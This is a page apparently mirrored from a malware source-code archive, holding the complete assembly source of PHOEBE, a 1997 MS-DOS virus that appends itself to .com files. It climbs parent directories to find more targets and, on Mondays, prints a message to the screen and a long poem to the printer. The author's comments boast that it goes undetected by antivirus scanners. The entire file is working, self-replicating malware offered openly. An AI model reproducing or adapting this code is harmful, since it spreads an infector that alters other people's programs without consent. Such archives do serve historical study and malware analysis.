Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-07-03 00:43:34 +00:00
Code Releases Activity
188c36d074
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.phoebe.asm
vxunderground b60161f008
Add files via upload
2021-01-12 17:55:26 -06:00

181 lines
8.2 KiB
NASM
Raw Blame History

;PHOEBE
;coded by Opic of the Codebreakers
;PHOEBE is an appending .com infector with DT via a dotdot routine
;infection criteria is met on a moday once all files that are capable of
;being infected by PHOEBE are, a payload is delivered:
;the monitor will print a message to the screen(in the French) which
;translates to;"Indroducing PHOEBE, she was coded in the heart of midwest
;america in the autumn of ninteen ninty-seven by Opic of The Codebreakers"
;along with a text string which will be printed to the printer. Thanx go
;out to:Spo0ky,Arsonic,and Sea4 for which without their help Phoebe whould
;not be what she is today. PHOEBE can be assembled using a86 V4.02
;it should be noted that phoebe has no anti-av routines, yet is still
;remains undetectable by most av software. a testament to the inconsistancy
;of many av scanners, specifically windows95 scanners.
db 0e9h,0,0 ;jump to virus code..
start_of_PHOEBE:
call delta ;get delta offset to get # of byte virus moved down
delta:
pop bp ; call a pop register to get the ip back into register
sub bp,offset delta ; we subtract the offset delta from bp(ip)
mov cx,3
mov di,100h
lea si,[bp+buffer]
rep movsb
jmp find_first ;jump to find the first file
find_first:
mov ah,4eh ;find's first file in the starting directory..
mov cx,7
lea dx,[bp+filespec]
int 21h
jnc open ;one found.. then infect da
jmp dir_loopy ;otherwise change directory
dir_loopy:
lea dx,[bp+dotdot]
mov ah, 3bh ;int for chdir
int 21h
jnc find_first ;find first file in new directory
jmp check_payload ; we finished spreading so we check payload criteria
find_next:
mov ah, 4Fh ;find next..
int 21h
jnc open ;one found.. INFECT IT!
jmp dir_loopy ;otherwise we do a cd..
open:
mov ax,3d02h ;open file
mov dx,9eh ;get the info from the dta
int 21h
mov bx,ax
mov ah,3fh ;read from file
mov cx,3 ;3 bytes
lea dx,[bp+buffer]
int 21h
mov ax,word ptr[80h + 1ah]
sub ax,end_of_PHOEBE - start_of_PHOEBE + 3
cmp ax,word ptr[bp+buffer+1]
je bomb_it_out
mov ax,word ptr[80h + 1ah]
sub ax,3
mov word ptr[bp+new_three+1],ax
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
mov ah,40h
lea dx,[bp+new_three]
mov cx,3
int 21h
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
mov ah,40h
lea dx,[bp+start_of_PHOEBE]
mov cx,end_of_PHOEBE - start_of_PHOEBE
int 21h
jmp bomb_it_out
bomb_it_out: ;closes the file..
mov ah,3fh ;close file
int 21h
jmp find_next ;find another..
check_payload:
mov ah,2ah ;gets system date
int 21h ;opens it
cmp al,001h ;compares, is it monday?
je payload ; if so, we got shit to do
jmp get_out ; if not then we chill till Mon.
payload:
mov ah,09h ; Fuction 09h: Print String to standard output
lea dx,screen ; Start of '$' terminated string
int 21h
mov ah,01h ;begin of printer sect of payload
mov dx,0h
int 17h ;int for initializing printer
lea si,string1
mov cx,String1Len
PrintStr:
mov ah,00h
lodsb
int 17h
loop PrintStr
Get_out:
lea di,100h
jmp di
new_three db 0e9h,0,0
filespec db '*.com',0
dotdot db '..',0
screen db "Voila PHOEBE! Elle etait code' dans la coeur de ,",10,13
screen2 db "l'amerique midwest a l'automne, dix-neuf cent",10,13
screen3 db 'quatre-vingt-dix-sept, par Opic des Codebreakers',10,13,'$'
;You have to have the "$" at the end of all the text you want to print
String1Len EQU EndStr1-String1
String1 db '*************************PHOEBE*************************',0dh,0ah
db 'Phoebe: high school knockout, better take our MONDAY to',0dh,0ah
db 'the tuesday prize fighter(you were a cab driver off on',0dh,0ah
db 'the distance).youre a runner or a lover:sacred taylor',0dh,0ah
db 'set our records straight one lost two late,im a little',0dh,0ah
db 'off time so set your ticker to mine:',0dh,0ah
db 'id love to have my halo of social grace recrowned.',0dh,0ah
db '(desert island ect.) home to ill will and',0dh,0ah
db 'misrepresentation. barter with me now mexico, i demand',0dh,0ah
db 'it.come bluebeard & red blood-we are life-even in our',0dh,0ah
db 'tied down mishaps. we are life; endure us. dead seven',0dh,0ah
db 'year old run over by a bus while stealing your first',0dh,0ah
db 'and only bicycle; endure. this is life even in my wine',0dh,0ah
db 'glass even in my ever faltering and constant doubt we',0dh,0ah
db 'are here, this is it, endure. even in on our toilet',0dh,0ah
db 'in the morning or in your shitbox or motel, you have',0dh,0ah
db 'made it-rejoice!-the ground will open up on us even',0dh,0ah
db 'before this glass is finished. this year will end for',0dh,0ah
db 'most of us.salt touches the ground, athens have we',0dh,0ah
db 'lost quite yet? savagly speared we went down quietly?',0dh,0ah
db 'giving up our youth or even worse our spirit so',0dh,0ah
db 'daintily as a beauty queen shits at midnight? was no',0dh,0ah
db 'one watching? listening? tell me athens: are we',0dh,0ah
db 'christians and lions? have i got my history all wrong?',0dh,0ah
db 'from the first to the last or one year past: "are these',0dh,0ah
db 'the depths of despair so unevenly documented in its',0dh,0ah
db 'text?".for once athens history repeats itself.tell me',0dh,0ah
db 'what do you think of our football games? are our glory',0dh,0ah
db 'days over? is america doomed with pre-ejaculation? i',0dh,0ah
db 'must know. slap me and tell me im like all the rest,',0dh,0ah
db 'athens,id feel so much better if you did.am i a thief',0dh,0ah
db 'stealing red robed memory? am i: train through a',0dh,0ah
db 'tunnel? rocketship blasting off? the washington',0dh,0ah
db 'monument? i bet i am.i am wimpering under your window',0dh,0ah
db 'sill or whispering to your pillowed ear:rejoice! we are',0dh,0ah
db 'famous watchers.sewer of amber letters, lips sewed a',0dh,0ah
db 'thread of truth to your tongue.i named and numbered my',0dh,0ah
db 'system the whole world over,and you?you got flowers and',0dh,0ah
db 'chocolates.like a steel warehouse summer turned calcium',0dh,0ah
db 'to carbon.',0dh,0ah
db '****coded/copyrighted:Opic*********Codebreakers,1997****',0Ch
EndStr1:
buffer db 0cdh,20h,0
end_of_PHOEBE:
View Git Blame Copy Permalink